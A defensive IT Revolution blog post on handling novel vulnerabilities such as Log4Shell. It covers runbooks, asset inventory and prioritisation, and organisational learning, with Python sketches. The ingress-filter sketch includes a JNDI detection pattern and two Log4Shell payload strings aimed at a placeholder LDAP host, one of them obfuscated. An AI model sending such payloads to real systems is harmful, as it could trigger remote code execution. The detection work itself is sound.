October 7, 2022

Novel Security Vulnerabilities: How to Prepare for and Prevent Attacks

By IT Revolution

When a new vulnerability becomes known to the public, it launches a race between the inevitable cyber attacks and the speed of remediating the vulnerability. One challenge is the large asymmetry between the resources required to hack your organization and the resources required to secure it. While most organizations favor predictability and prevention, neither is always possible in a world of unknown threats. To build a safety net around incomplete prevention, we must continuously prepare for the unpredictable by minimizing the phases in our remediation life cycles.

Remediation Runbook

“All hands on deck” understates the stakes: a poorly organized response could destroy a brand or become an extinction-level event. High-performing organizations set expectations and provide a clear runbook detailing which people and teams play the vital roles of maintaining or pursuing order in remediation.

Elements of a runbook could include the following:

  • How to facilitate and coordinate incidents upon vulnerability declaration. The governing body for this (typically a cyber incident response team) has the authority and the ability to determine the threat level and the response required.
  • Urgency prioritization (judgment calls on simultaneously announced threats).
  • Strategy for inventory collection and assessment.
  • Strategy on mitigation and/or remediation at various layers of infrastructure.

Infrastructure Inventory

One of the anchors of your remediation journey will be the collection and assessment of vulnerable infrastructure. If the inventory comes from a configuration management database, ensure it’s actively updated, accurate, and maintained. This inventory of endpoints should come from a dynamically generated and updated list based on reality. With this type of list, exploits can be tested in real time by a Red Team or, even better, by the teams who own the application(s) themselves. Prioritizing the endpoints that we know are vulnerable allows us to stay focused on what is most at risk.

Another useful source is a regularly published inventory from the software composition analysis (SCA) in each of your deployment pipelines. (This assumes that all CI/CD pipelines include a job to inventory the components used to build your products. If you don’t yet have such a job, look into a software bill of materials, or SBOM.) Reflecting on aggregated SCA inventories can help indicate how widespread open-source software is in your business and critical systems. This can spur a few thought-provoking questions:

  • Do we understand the ongoing cost of open-source software?
  • Have we vetted all the sources of the open-source code we use?
  • Can we standardize our overall use to mitigate our risk?
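As a rough illustration of what an aggregated SCA inventory makes possible, the sketch below inverts per-pipeline component lists into a component index, then asks which pipelines ship an affected version. The pipeline names, component versions, and data layout are all hypothetical; real SBOM formats carry much more detail, and the set of affected versions would come from the vulnerability advisory.

```python
from collections import defaultdict

# Hypothetical per-pipeline SCA output: pipeline name -> [(component, version)].
# All names and versions here are illustrative placeholders.
PIPELINE_INVENTORIES = {
    "checkout-service": [("log4j-core", "2.14.1"), ("jackson-databind", "2.13.0")],
    "search-service": [("log4j-core", "2.17.1"), ("guava", "31.0")],
    "billing-batch": [("log4j-core", "2.14.1")],
}


def index_by_component(inventories):
    """Invert pipeline -> components into component -> {version: [pipelines]}."""
    index = defaultdict(lambda: defaultdict(list))
    for pipeline, components in inventories.items():
        for name, version in components:
            index[name][version].append(pipeline)
    return index


def pipelines_using(index, component, affected_versions):
    """Return the sorted pipelines that ship any of the affected versions."""
    hits = set()
    for version in affected_versions:
        # .get() avoids creating empty entries in the defaultdict.
        hits.update(index.get(component, {}).get(version, []))
    return sorted(hits)


if __name__ == "__main__":
    index = index_by_component(PIPELINE_INVENTORIES)
    # The affected-version set is an assumption supplied by the caller.
    print(pipelines_using(index, "log4j-core", {"2.14.1"}))
```

The same index also answers the standardization question: a component that appears in many versions across pipelines is a candidate for consolidation.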

Asset Prioritization

You can prioritize your digital inventory by attributes such as exposure, criticality, production only, and customer data. External-facing endpoints are the most obvious to set as high priority, but there are many instances where purely internal-facing endpoints are a high priority as well. It is also beneficial to focus on your company’s predetermined “crown jewel” assets—that is, the most critical assets for your business. By establishing this ordered list ahead of time, you ensure that your teams already know what they need to protect first before they get to work.
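One way to establish such an ordered list ahead of time is to encode the attributes as a sort key. The sketch below is a minimal example: the `Asset` fields mirror the attributes named above, but the asset names and the precedence among attributes (crown jewels first, then exposure, then customer data, then production) are assumptions that each organization would set for itself.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Asset:
    # Hypothetical record; field names are chosen for this illustration.
    name: str
    external_facing: bool
    crown_jewel: bool
    production: bool
    holds_customer_data: bool


def priority_key(asset):
    """Sort key: tuples compare left to right, and False sorts before True,
    so each flag is negated to put flagged assets first."""
    return (
        not asset.crown_jewel,          # assumed precedence: crown jewels first
        not asset.external_facing,
        not asset.holds_customer_data,
        not asset.production,
        asset.name,                     # stable, readable tie-breaker
    )


def prioritize(assets):
    """Return assets ordered from highest to lowest remediation priority."""
    return sorted(assets, key=priority_key)


if __name__ == "__main__":
    inventory = [
        Asset("marketing-site", True, False, True, False),
        Asset("payments-api", True, True, True, True),
        Asset("internal-wiki", False, False, True, False),
        Asset("hr-database", False, True, True, True),
    ]
    for asset in prioritize(inventory):
        print(asset.name)
```

Note that the purely internal `hr-database` ranks above the external `marketing-site` under this ordering, which reflects the point that internal-facing endpoints can still be high priority.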

Remediation Execution

In many cases, you can protect highly available services with multiple layers of protection. For example, Log4Shell can be thwarted at the ingress layer by detecting the signature of the exploit and rejecting its request before it gets to the vulnerable inner application. Performing threat modeling during the design phase of an application can help establish short-term options in case your other options are not as expedient to change.
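To make the ingress-layer idea concrete, here is a minimal sketch of a signature check that an ingress filter might apply to the request path and header values. It looks only for the literal `${jndi:` lookup prefix, raw or URL-encoded. The function names and the decode limit are assumptions for illustration. A naive signature like this is a short-term mitigation at best: obfuscated payloads using nested lookups evade it, so it buys time for patching rather than replacing it.

```python
import re
from urllib.parse import unquote

# Naive signature: the literal "${jndi:" lookup prefix, case-insensitive.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def looks_like_log4shell(value, max_decode_rounds=2):
    """Return True if value contains the JNDI lookup prefix, raw or URL-encoded.

    Decodes at most max_decode_rounds times to catch double encoding.
    """
    candidate = value
    for _ in range(max_decode_rounds + 1):
        if JNDI_LOOKUP.search(candidate):
            return True
        decoded = unquote(candidate)
        if decoded == candidate:
            break  # nothing left to decode
        candidate = decoded
    return False


def should_reject(headers, path):
    """Check the request path and every header value against the signature."""
    return any(looks_like_log4shell(v) for v in [path, *headers.values()])


if __name__ == "__main__":
    request_headers = {"User-Agent": "${jndi:ldap://example.invalid/a}"}
    print(should_reject(request_headers, "/search"))
    # Known limitation: nested lookups such as "${${lower:j}ndi:...}" are
    # NOT caught by this simple pattern.
    print(looks_like_log4shell("${${lower:j}ndi:ldap://example.invalid/a}"))
```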

Post-Remediation Reassessment

Once we enter the reflection stage of addressing a vulnerability (after remediation), we can review the original reasons why vulnerable libraries and modules were used in the first place. This should spur discussions on whether previously held assumptions and constraints still hold true. Many organizations’ feelings about open-source software have shifted from “the more we can leverage, the better” to “every dependency brings risk and future cost.” As the Log4Shell experience shows, free software is anything but free.

For organizations that embrace continuous improvement, the lessons learned from remediating a vulnerability go into future road maps, design decisions, or operational changes. Here are some examples of policies born from vulnerability remediation:

  • Establish nightly SCA scans
  • Only use open-source components with support contracts
  • Detect excess database queries in real time and report anomalies
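As one hedged illustration of the last policy, the sketch below flags an interval whose query count sits far above a rolling baseline. The class name, window size, threshold, and the use of a simple mean-plus-standard-deviation rule are all assumptions; a production system would more likely rely on its monitoring platform's anomaly detection.

```python
from collections import deque
from statistics import mean, pstdev


class QueryRateMonitor:
    """Flags intervals whose query count is far above a rolling baseline."""

    def __init__(self, window=60, threshold=3.0, min_samples=10):
        self.history = deque(maxlen=window)  # recent normal counts only
        self.threshold = threshold           # allowed deviations above the mean
        self.min_samples = min_samples       # samples needed before judging

    def observe(self, queries_per_interval):
        """Record one interval's count; return True if it is anomalously high."""
        anomalous = False
        if len(self.history) >= self.min_samples:
            baseline = mean(self.history)
            # Floor the spread at 1.0 so a perfectly flat baseline does not
            # turn every tiny increase into an alert.
            spread = max(pstdev(self.history), 1.0)
            anomalous = queries_per_interval > baseline + self.threshold * spread
        if not anomalous:
            # Keep anomalies out of the baseline so a sustained attack
            # does not gradually become the new normal.
            self.history.append(queries_per_interval)
        return anomalous


if __name__ == "__main__":
    monitor = QueryRateMonitor(window=20, threshold=3.0, min_samples=5)
    for count in [100, 102, 98, 101, 99, 100, 500, 101]:
        if monitor.observe(count):
            print(f"anomaly: {count} queries in interval")
```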

Ideally, you’ll experiment with tactical approaches to mitigate the exposure to future risk. By assessing risk, we have another lens through which to view the trade-offs of open-source software. These discussions should heavily influence make-versus-buy decisions, technical architecture, and team topology layout.

All dimensions associated with the response to a vulnerability typically present opportunities for improvement. Whether it’s people, processes, or tools, our organizations likely have areas in which we can prepare and evaluate our ability to respond to new and innovative threats to our businesses.

Organizational Learning

As security threats emerge, our organizations must continually learn and adapt. Our adversaries certainly do! A foundational principle of DevOps is that organizations that create adaptive capacity and learn from both incidents and near misses will outperform those that isolate responses to silos. Such learning happens as a result of deliberate structures that promote feedback and introspection.

As an industry, we have created learning loops that embrace software development and IT operations. Motivated by successful results, we have extended those loops to encompass finance and security. We need to further extend these loops to include legal and data privacy teams as other aspects of governance.

Challenges with Security Learning

When we touch on legal and data privacy matters, however, corporate risk management can impede learning. Customers, regulators, and shareholders have all used a company’s admission of a security incident as cause for legal action. In such cases, knowing the details of an incident means you might be subpoenaed. You may be called on to testify in court about the incident. Your device and account may be subject to legal discovery. Even receiving an email about an incident can cause your account to be subject to a legal hold. A company has legitimate reasons to limit the number of people who could be dragged into these expensive and time-consuming processes.

Separately, if the incident involves malware or extortion, the company will not want to appear as a soft target. That would induce other attackers to make attempts at the company. The entry point from the first attack may be closed by this time, but a concerted effort by attackers would likely reveal other entry points.

We must also think about the people involved. Humans are not good at estimating risk, even at the best of times. As we saw in our section on the human response to a security event, people under threat will experience high levels of stress and fear, which can lead them to catastrophize situations and engage in self-protection. The instinct to “hunker down” and defend against a potentially career-ending, brand-destroying, or extinction-level event can also cause people to clamp down on sharing information. While natural, this instinct also breaks the learning loop.

In response to risks, organizations may choose to treat information about security threats and responses as “state secrets.” These are siloed within the company. Oversight may even be delegated to an outside counsel. Such structures limit learning to particular silos within the company. The security, data privacy, or legal teams may know about incidents that others never even hear about. Developers will not learn about the nature of threats facing their software; platform teams may not be aware of supply-chain attacks, and so on.

Distilled Security Learning

Learning is a team sport. It works best when players with different skills are able to interact, compare experiences, and create solutions together. To create such a learning organization, companies should apply many of the same lessons from DevOps:

  • Use blameless post-mortems to gather information from many parties.
  • Look for multiple contributing factors; don’t stop at a single “root cause.”
  • Examine the security threats that didn’t cause harm to understand what layers of protection succeeded.

How shall we reconcile the need for feedback and learning with the need to partition and manage legal and financial risk?

Unexplained Security Mandates

A common response is for a small group of people who are “in the know” to issue mandates and standards that the rest of the organization must simply obey. This does not encourage learning! The people receiving the mandates will not understand the motivation behind them and are likely to resist, for at least two reasons: First, it is human nature to resent or resist dictates that appear arbitrary or capricious. Second, the teams called on to implement the mandates are themselves subject to delivery pressure. This results in the common conflict between “security wants X” while “the customer (or product manager) wants Y.” The team plays the role of the rope in this tug-of-war. They can see the value created by building the feature road map but can’t know what value is protected by the seemingly ungrounded security mandate.

Balancing Risk with Learning

We suggest the following if the full details of security incidents and threats must be isolated for risk management:

  • A limited number of technically knowledgeable people should be included in the team that has the full details.
  • Those with the full information should apply those lessons about learning mentioned above.
  • That subteam is responsible for distilling the essence of the incident in a way that explains the nature of the threat and what protective response is necessary (coding patterns, replacement of libraries, connectivity restrictions, etc.).
  • The technology community should broadly discuss the “distilled” version of the incident.
  • The technology community may very well find alternative solutions that the smaller group did not. The technical subteam from the incident review brings that additional knowledge back to the whole team.

This is intentionally a compromise approach, attempting to trade off risk with learning effectiveness. If full information about vulnerabilities and remediations can be shared broadly across the organization, the organization will receive greater benefits.

Conclusion

The cost of defending against security vulnerabilities will continue to rise. As it does, the asymmetry between the cost of defense and the cost of attack will worsen. Organizations must be prepared to adapt to novel classes of security vulnerability, as there is no evidence that the rate of discovery will decrease.

We can derive some lessons from the Log4Shell vulnerability uncovered in December 2021. As we saw with Example 3, some organizations that relied on static databases of software composition had to work through inaccurate, misleading, or disputed information. Those that were able to inventory live systems moved more rapidly into mitigation and remediation.

When a novel vulnerability arises, we must consider the human psychological response as well as the technical and sociotechnical responses. Humans under stress will react in predictable ways, as described by the Kübler-Ross Change Curve. The early stages of this curve—shock, denial, frustration, and depression—are not productive in terms of mitigating vulnerabilities. We can improve the organization’s outcomes by helping people move through those stages to the more useful ones—experiment, decision, and integration—more smoothly and rapidly. However, when it comes to security threats, we must also be aware that we are asking people to progress at a ridiculously accelerated pace: hours and days instead of weeks and months.

Organizations that practice shared ownership of responsibilities are better able to reteam dynamically to meet the challenges of novel vulnerabilities than those that rely on static organizational structures and processes. We recommend the same culture of shared responsibility, broad communication, and iterative adaptation for security vulnerabilities as we do for operational incidents.

Organizations can prepare before a vulnerability strikes through deliberate practice and knowledge sharing. We recommend creating, publishing, and practicing runbooks about security responses that clarify certain needed roles. These roles are not exclusive or comprehensive. Rather, they serve to ensure that communications have a focal point, response measures are prioritized, and everyone knows who is organizing the collective responses. These roles may be reassigned to different people during the event, but the roles themselves should be understood in advance.

The threats to our systems go beyond network-based attacks at runtime to encompass the software development process itself. We have seen attacks against software supply chains, open-source components, build systems, and other portions of the software development and delivery ecosystem. As these classes of attack proliferate, we see a broad shift in developer attitudes toward dependencies and use of open-source components. Viewpoints are shifting from “reusing other people’s code is better than writing new code” to a more balanced understanding of the ongoing cost of incorporating a deep tree of constantly shifting dependencies. Organizations are becoming more sensitive to the long-term carrying cost of open-source components.

Organizational learning about security vulnerabilities has some special considerations that lead some companies to partition or silo information. This partitioning can reduce risk of legal exposure. At the same time, however, the lost learning potential among development and operations personnel means that future vulnerabilities and patterns of vulnerabilities may be more damaging than they otherwise could be. We recommend sharing the essential nature of the vulnerabilities and prevention mechanisms through distilled security learning, even when the specific details about affected systems, users, or customers cannot be shared.

With security vulnerabilities, as with other risks to our companies, we recommend that you assess your specific context and adapt these patterns and practices to fit it. As you do so, continue to apply the core principles of iterative learning and adaptation, a culture of knowledge sharing and collaboration, and continuous delivery of value.

Stay safe out there!

- About The Authors
IT Revolution

Trusted by technology leaders worldwide. Since publishing The Phoenix Project in 2013, and launching DevOps Enterprise Summit in 2014, we’ve been assembling guidance from industry experts and top practitioners.
